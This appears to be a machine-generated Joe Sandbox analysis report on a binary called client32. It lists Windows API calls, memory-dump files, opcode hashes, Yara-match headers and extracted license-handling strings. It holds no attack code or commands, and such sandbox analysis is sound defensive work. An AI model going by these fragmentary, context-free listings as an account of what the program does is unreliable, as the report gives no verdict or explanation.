                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ClipboardGlobal$AllocBeepCloseDataEmptyFreeLockMessageOpenUnlock
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2291271916-0
                                                                                                                                                                                                    • Opcode ID: e34d2ed037c0cc0ce93fd965415a0307a16a5f75420eb2469a8d43960e23cf46
                                                                                                                                                                                                    • Instruction ID: a74b028ba7232528d54cbd7924e13de8c44cceb4ce50299c474c183637a6b5bc
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e34d2ed037c0cc0ce93fd965415a0307a16a5f75420eb2469a8d43960e23cf46
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 67019276A012636BD3026B748CCCE5FBBACDF55349704C079F626C6109EB74C8058762
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • IsIconic.USER32(?), ref: 11157677
                                                                                                                                                                                                    • ShowWindow.USER32(?,00000009), ref: 11157687
                                                                                                                                                                                                    • BringWindowToTop.USER32(?), ref: 11157691
                                                                                                                                                                                                    • IsWindow.USER32(00000000), ref: 111576D0
                                                                                                                                                                                                    • IsIconic.USER32(00000000), ref: 111576DB
                                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000009), ref: 111576E8
                                                                                                                                                                                                    • BringWindowToTop.USER32(00000000), ref: 111576EF
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$BringIconicShow
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2588442158-0
                                                                                                                                                                                                    • Opcode ID: 038ff0c7e592a338b47f23a8c12551223a3be2bd5e1829126b81d4076912602b
                                                                                                                                                                                                    • Instruction ID: a9c9b89abb11ca8be4b118751fbd9485df176094a83bcf99db43cce38e22dc7e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 038ff0c7e592a338b47f23a8c12551223a3be2bd5e1829126b81d4076912602b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D431E575A00A2A9FD751CF54D985BAEF7B8FF45714F00816AE921E3380EB35A901CFA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 689D8BA8
                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 689D8BBD
                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(689F427C), ref: 689D8BC8
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 689D8BE4
                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 689D8BEB
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085295170.00000000689B0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085459790.00000000689F9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085581340.0000000068A00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2579439406-0
                                                                                                                                                                                                    • Opcode ID: 3724192b95de292b102d4acd3eab990ba856ff1189ec4cc2cacf7c83c26f21ab
                                                                                                                                                                                                    • Instruction ID: f92d7c1a855f37a37013310ea060ea891f2e4aad2e741cef38954f51e99dd048
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3724192b95de292b102d4acd3eab990ba856ff1189ec4cc2cacf7c83c26f21ab
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FF219CB4828204DFDF49DF69F688E4C3BB8BB0A318F41451AE91997384E7B49981CF09
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 689DFB39
                                                                                                                                                                                                      • Part of subcall function 689DD3F5: Sleep.KERNEL32(00000000,689D6F16,00000001,00000214), ref: 689DD41D
                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,?,00000000,00000000), ref: 689DFC16
                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,?,00000000,00000000), ref: 689DFC36
                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,?,00000000,00000002), ref: 689DFC72
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085295170.00000000689B0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085459790.00000000689F9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085581340.0000000068A00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: InfoLocale$ErrorLastSleep
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1708069870-0
                                                                                                                                                                                                    • Opcode ID: 63e2f029291f74ca6f491f629fa1fd4a8b1a2b606ede9d2763d7b504d6affe8a
                                                                                                                                                                                                    • Instruction ID: f1b7a165b8edf12bb837097e5ac2f0841b0388693f904e314e14fa4a36a55d69
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 63e2f029291f74ca6f491f629fa1fd4a8b1a2b606ede9d2763d7b504d6affe8a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8541A07290461AABEF119F648C55BAB7BBCEF44358F9080A9FC28D2141EB75C950CF68
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,1105990A,DuplicateHandle), ref: 11059281
                                                                                                                                                                                                    • FormatMessageA.KERNEL32(00001100,00000000,00000000,?,?,1105990A,DuplicateHandle), ref: 1105928F
                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,1105990A,DuplicateHandle), ref: 11059299
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1365068426-0
                                                                                                                                                                                                    • Opcode ID: c4da030cc566985fed10b8ae72e49a46dab86cf533d5b385c533f073b0b7a5cb
                                                                                                                                                                                                    • Instruction ID: 5b7cf9c0659eada95368eb5e30aa7fe70508538aa6eda4fa9add4fab25305eb2
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c4da030cc566985fed10b8ae72e49a46dab86cf533d5b385c533f073b0b7a5cb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D2D05E79684308BBE2159BD0CC4AFADB7ACD70CB16F200166FB01961C0DAB169008B76
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetRect.USER32(?,00000000,00000000,00000000,00000000), ref: 1101D232
                                                                                                                                                                                                    • GetLocalTime.KERNEL32(00000002), ref: 1101D25C
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LocalRectTime
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2644259849-0
                                                                                                                                                                                                    • Opcode ID: de18328b6b15506cedc7e23451f66c7985023e4612589437c270b1aaafaaec95
                                                                                                                                                                                                    • Instruction ID: 290189b485d165d605b85d0a399bd35ca550a15b876ac08f977e3d1591b43d19
                                                                                                                                                                                                    • Opcode Fuzzy Hash: de18328b6b15506cedc7e23451f66c7985023e4612589437c270b1aaafaaec95
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 01316C75904B44DFD320CF68D944B9AFBE8EB48714F00896EE86AC7780DB34E904CB51
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • DeviceIoControl.KERNEL32(?,00000101,?,00000001,00000000,00000000,?,00000000), ref: 1110F462
                                                                                                                                                                                                    • keybd_event.USER32(00000091,00000046,00000000,00000000), ref: 1110F495
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ControlDevicekeybd_event
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1421710848-0
                                                                                                                                                                                                    • Opcode ID: 407e97887e86df9f2c0a03872b9b60b55f09692966eacca027f370d3071f714e
                                                                                                                                                                                                    • Instruction ID: e6d7b6f79d867a431c183ac05059020376f9649e5a26ee949abc8e508daa714a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 407e97887e86df9f2c0a03872b9b60b55f09692966eacca027f370d3071f714e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 32014C72F017127AF30185699D46FE7FA1CEB81720F028238FE59E71C0DA605D05C7A2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,002A400C,00000000,00000000,00000000,00000000,11030FDE,00000000), ref: 110A9260
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ControlDevice
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2352790924-0
                                                                                                                                                                                                    • Opcode ID: bee1594c9b993945fc66beb885ff9e6d2c70a72c6a38e995273342c6cce042f3
                                                                                                                                                                                                    • Instruction ID: e696868f72d0725410e46aa1b0c9657244e5a899ecae170b9f1eee7695916dac
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bee1594c9b993945fc66beb885ff9e6d2c70a72c6a38e995273342c6cce042f3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D5E0CDF5A0820CBFA304DEF99CC1C6BB79CD5063687100399F629C3141E5719D109770
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1102B5F5
                                                                                                                                                                                                    • GetTempFileNameA.KERNEL32(?,nsm,00000000,?), ref: 1102B658
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileNameTempwsprintf
                                                                                                                                                                                                    • String ID: %snsm.%s.%02d.lic$*** Activate new license file in registy, key [%s]$*** Copied and read new license file$*** Copy enforce section for config %x$*** Set eval flags failed, error [%d]$*** Set eval flags registy, key [%s]$*** product after copy %d$*** product before copy %d$141700$HasEval$IsA()$Portable Tech Console\nsm.lic$Portable Tutor\nsm.lic$Product$ReplaceLicFile : Attempt to rename %s to %s$ReplaceLicFile : File checksum matches new checksum so don't write file but load$ReplaceLicFile : License error %d reading %s$ReplaceLicFile : Load new license file$ReplaceLicFile : Read license file$ReplaceLicFile : Rename current license file to %s$ReplaceLicFile : Revert to previous license$ReplaceLicFile : Status after config test %d - lic error %d$ReplaceLicFile : Status after renames %d - error %d$ReplaceLicFile : Written file %s, read into temporary config$ReplaceLicFile : bWriteFile = %d, LoadLicense = %d$ReplaceLicFile : flags & 2 - just reread the license details$V12.10.4$_License$_checksum$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$nsm$product$z:
                                                                                                                                                                                                    • API String ID: 2029944419-4068609801
                                                                                                                                                                                                    • Opcode ID: f70fa031849871356d7d381289b355860a7e4332ff62328408755086c15e345e
                                                                                                                                                                                                    • Instruction ID: 3f7d5152d730d53d09c226c0233c709ff6bb61f284797e681b654b5f7b742470
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f70fa031849871356d7d381289b355860a7e4332ff62328408755086c15e345e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2C020575E0062A6BDB20DBA4CC40FEEF379AF84708F5441D5E91967181EB716A84CFA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 1107B404
                                                                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 1107B450
                                                                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 1107B457
                                                                                                                                                                                                    • GetTextExtentPointA.GDI32(?,?,00000000,?), ref: 1107B4AA
                                                                                                                                                                                                    • SetRect.USER32(?,?,?,?,?), ref: 1107B4E3
                                                                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 1107B4F4
                                                                                                                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 1107B4FB
                                                                                                                                                                                                    • SetRect.USER32(?,00000001,?,?,?), ref: 1107B532
                                                                                                                                                                                                    • SetRect.USER32(?,00000004,?,?,?), ref: 1107B592
                                                                                                                                                                                                    • OffsetRect.USER32(?,00000001,00000001), ref: 1107B5FF
                                                                                                                                                                                                    • OffsetRect.USER32(?,00000001,00000001), ref: 1107B629
